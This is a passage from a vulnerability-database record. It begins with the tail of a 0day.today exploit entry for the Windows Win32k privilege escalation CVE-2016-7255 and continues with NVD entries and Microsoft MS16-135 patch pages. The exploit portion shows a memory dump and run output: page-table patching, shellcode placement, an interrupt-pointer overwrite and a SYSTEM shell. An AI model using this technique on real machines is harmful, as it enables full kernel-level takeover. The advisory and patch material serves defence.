00 00 00 | cx..............\r\n000000003D9ECE70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECE90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECED0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECEF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECF60 | 67 18 21 00 01 00 00 80 00 00 00 00 00 00 00 00 | g.!.............\r\n000000003D9ECF70 | 00 00 00 00 00 00 00 00 63 10 98 00 00 00 00 00 | ........c.......\r\n000000003D9ECF80 | 63 40 98 00 00 00 00 00 00 00 00 00 00 00 00 00 | [email\u00a0protected]\r\n000000003D9ECF90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................\r\n000000003D9ECFE0 | 63 d8 34 02 00 00 00 00 63 38 8c 00 00 00 00 00 | c.4.....c8......\r\n000000003D9ECFF0 | 00 00 00 00 00 00 00 00 63 f0 99 00 00 00 00 00 | ........c.......\r\n \r\n+] Selected spurious PML4E: fffff67b3d9ecf00\r\n+] Spurious PT: fffff67b3d9e0000\r\n+] Content pml4e fffff67b3d9ecff8: 99f063\r\n+] Patching the Spurious Offset with 99f067\r\n+] Content pdpte fffff67b3d9ffff8: 9a0063\r\n+] Patching the Spurious Offset with 9a0067\r\n+] Content pdpte fffff67b3ffffff0: 821063\r\n+] Patching the Spurious Offset with 821067\r\n+] Content pte fffff67fffffe800: 1967\r\n+] Patching the Spurious Offset with 1967\r\nOriginal HalpIntteruptRequest pointer: fffff80150e1fc40\r\n+] Selected spurious PML4E: fffff67b3d9ecf08\r\n+] Spurious PT: fffff67b3d9e1000\r\n+] Content pml4e fffff67b3d9ecff8: 99f063\r\n+] Patching the Spurious Offset with 99f067\r\n+] Content pdpte fffff67b3d9ffff8: 9a0063\r\n+] Patching the Spurious Offset with 9a0067\r\n+] Content pdpte fffff67b3ffffff0: 821063\r\n+] Patching the Spurious Offset with 821067\r\n+] Content pte fffff67fffffe800: 1967\r\n*** Patching the original location to enable NX...\r\n+] Patching the Spurious Offset with 1967\r\nHAL address: fffff67b3d9e1000\r\n+] w00t: Shellcode stored at: ffffffffffd00d50\r\n+] Selected spurious PML4E: fffff67b3d9ecf10\r\n+] Spurious PT: fffff67b3d9e2000\r\n+] Content pml4e fffff67b3d9ecff8: 99f063\r\n+] Patching the Spurious Offset with 99f067\r\n+] Content pdpte fffff67b3d9ffff8: 9a0063\r\n+] Patching the Spurious Offset with 9a0067\r\n+] Content pdpte fffff67b3ffffff0: 821063\r\n+] Patching the Spurious Offset with 821067\r\n+] Content pte fffff67fffffe800: 1967\r\n+] Patching the Spurious Offset with 1967\r\nPatch HalpInterruptController->HalpApicRequestInterrupt: fffff67b3d9e26e8 with ffffffffffd00d50\r\nMicrosoft Windows [Version 10.0.14393]\r\n(c) 2016 Microsoft Corporation. All rights reserved.\r\n \r\nC:\\Users\\qa\\Desktop>\r\nC:\\Users\\qa\\Desktop>whoami\r\nnt authority\\system\r\n \r\nC:\\Users\\qa\\Desktop>\n\n# 0day.today [2018-02-18] #", "sourceHref": "https://0day.today/exploit/26414", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2022-03-23T15:11:40", "description": "The kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, and 1607, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka \"Win32k Elevation of Privilege Vulnerability.\"", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-10T07:00:00", "type": "cve", "title": "CVE-2016-7255", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255"], "modified": "2018-10-12T22:14:00", "cpe": ["cpe:/o:microsoft:windows_vista:*", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1607"], "id": "CVE-2016-7255", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7255", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*"]}, {"lastseen": "2022-04-12T21:18:13", "description": "Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1698.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T23:15:00", "type": "cve", "title": "CVE-2021-1732", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1732"], "modified": "2022-04-12T18:41:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2021-1732", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1732", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:57:29", "description": "Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1732.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T23:15:00", "type": "cve", "title": "CVE-2021-1698", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1732"], "modified": "2021-03-03T19:03:00", "cpe": ["cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:1909"], "id": "CVE-2021-1698", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1698", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*"]}], "mskb": [{"lastseen": "2022-05-12T13:04:53", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of an affected system. \n \nTo learn more about the vulnerability, see [Microsoft Security Bulletin MS16-135](<https://technet.microsoft.com/library/security/ms16-135>). \n\n## More Information\n\nImportant \n \n\n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Turn on automatic updating in Control Panel](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=3198234>) website. \n\n\n## More Information\n\n## \n\n__\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Support for Microsoft Update](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Troubleshooting and Support](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Virus Solution and Security Center](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\nFile Information\n\n## \n\n__\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB3198234-ia64.msu| DD7E655150D4F2D441743C212A7FEE1871CCF781| 93A226E7C857A8D9C4AD77E3BC0CB82A77B471A90F74E5C1E9CAD462838D5B18 \nWindows6.0-KB3198234-x64.msu| D35CBDB3FEE35903E7EA4901A38F18F9376CD94F| 3CBD04470C7CD465405B499C3196E8D8CCA6DF2B1E836F88F7CFA86BA301A256 \nWindows6.0-KB3198234-x86.msu| 965D8E33DA8E948E45E47ECB56837CE2028A8BCB| 82F4D545700403418BAD7D1DF062738D23EBA1368C8F6D80B5C544C9C83235BB \n \n\n\n## \n\n__\n\nFile information\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. \n \nWindows Vista and Windows Server 2008 file informationNotes The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed. \n \nFor all supported ia64-based versionsFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nWin32k.sys| 6.0.6002.19706| 6,697,984| 25-Oct-2016| 22:52| IA-64 \nWin32k.sys| 6.0.6002.24029| 6,707,712| 25-Oct-2016| 14:29| IA-64 \n \n \nFor all supported x64-based versionsFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nWin32k.sys| 6.0.6002.19706| 2,804,736| 25-Oct-2016| 23:10| x64 \nWin32k.sys| 6.0.6002.24029| 2,807,296| 25-Oct-2016| 14:48| x64 \n \n \nFor all supported x86-based versionsFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nWin32k.sys| 6.0.6002.19706| 2,073,600| 25-Oct-2016| 22:47| x86 \nWin32k.sys| 6.0.6002.24029| 2,080,768| 25-Oct-2016| 14:26| x86 \n \n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-08T08:00:00", "type": "mskb", "title": "MS16-135: Description of the security update for Windows kernel-mode drivers: November 8, 2016", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255"], "modified": "2016-11-08T08:00:00", "id": "KB3198234", "href": "https://support.microsoft.com/en-us/help/3198234", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:49:58", "description": "<html><body><p>Resolves a vulnerability in Windows that could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of the system.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of the affected system. <br/><br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/ms16-135\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS16-135</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important </span><br/><br/><ul class=\"sbody-free_list\"><li>All future security and non-security updates for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 require update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-3\" target=\"_self\">2919355</a> to be installed. We recommend that you install update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-4\" target=\"_self\">2919355</a> on your Windows RT 8.1-based, Windows 8.1-based, or Windows Server 2012 R2-based computer so that you receive future updates. </li><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>.</li></ul></div><h2>Additional information about this security update</h2><div class=\"kb-moreinformation-section section\"><br/>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information.<br/><br/><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/help/3199135\" id=\"kb-link-6\" target=\"_self\">3199135</a> MS16-135: Security update for Windows kernel-mode drivers: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3198234\" id=\"kb-link-7\" target=\"_self\">3198234</a> MS16-135: Description of the security update for Windows kernel-mode drivers: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3194371\" id=\"kb-link-8\" target=\"_self\">3194371</a> MS16-135: Description of the security update for Windows kernel-mode drivers: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3198218\" id=\"kb-link-9\" target=\"_self\">3198218</a> MS16-131 and MS16-135: Description of the security update for Windows: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3197873\" id=\"kb-link-10\" target=\"_self\">3197873</a> November 2016 Security Only Quality Update for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2</li><li><a href=\"https://support.microsoft.com/help/3197874\" id=\"kb-link-11\" target=\"_self\">3197874</a> November 2016 Security Monthly Quality Rollup for Windows 8.1, and Windows Server 2012 R2</li><li><a href=\"https://support.microsoft.com/help/3197876\" id=\"kb-link-12\" target=\"_self\">3197876</a> November 2016 security only quality update for Windows Server 2012</li><li><a href=\"https://support.microsoft.com/help/3197877\" id=\"kb-link-13\" target=\"_self\">3197877</a> November 2016 Security Monthly Quality Rollup for Windows Server 2012</li><li><a href=\"https://support.microsoft.com/help/3197867\" id=\"kb-link-14\" target=\"_self\">3197867</a> November 2016 security only quality update for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a href=\"https://support.microsoft.com/help/3197868\" id=\"kb-link-15\" target=\"_self\">3197868</a> November 2016 Security Monthly Quality Rollup for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a href=\"https://support.microsoft.com/help/3198585\" id=\"kb-link-16\" target=\"_self\">3198585</a> Cumulative Update for Windows 10: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3200970\" id=\"kb-link-17\" target=\"_self\">3200970</a> Cumulative Update for Windows 10 Version 1607 and Windows Server 2016: November 8, 2016</li><li><a href=\"https://support.microsoft.com/help/3198586\" id=\"kb-link-18\" target=\"_self\">3198586</a> Cumulative Update for Windows 10 Version 1511: November 8, 2016</li></ul></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Security update deployment information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><br/><br/><h4 class=\"sbody-h4\">Windows Vista (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-20\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstalling updates. To uninstall an update that is installed by WUSA, click <strong class=\"uiterm\">Control Panel</strong>, and then click <span class=\"text-base\">Security</span>. Under <span class=\"sbody-userinput\">Windows Update</span>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3198234\" id=\"kb-link-21\" target=\"_self\">Microsoft Knowledge Base Article 3198234</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2008 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-22\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstalling updates. To uninstall an update that is installed by WUSA, click <strong class=\"uiterm\">Control Panel</strong>, and then click <span class=\"text-base\">Security</span>. Under <span class=\"sbody-userinput\">Windows Update</span>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3198234\" id=\"kb-link-23\" target=\"_self\">Microsoft Knowledge Base Article 3198234</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 7 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197867</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197868</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197867</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197868</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-24\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall </span>setup switch or click <strong class=\"uiterm\">Control Panel</strong>, and then click <strong class=\"uiterm\">System and Security</strong>. Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197867\" id=\"kb-link-25\" target=\"_self\">Microsoft Knowledge Base Article 3197867</a><br/>See <a href=\"https://support.microsoft.com/help/3197868\" id=\"kb-link-26\" target=\"_self\">Microsoft Knowledge Base Article 3197868</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its 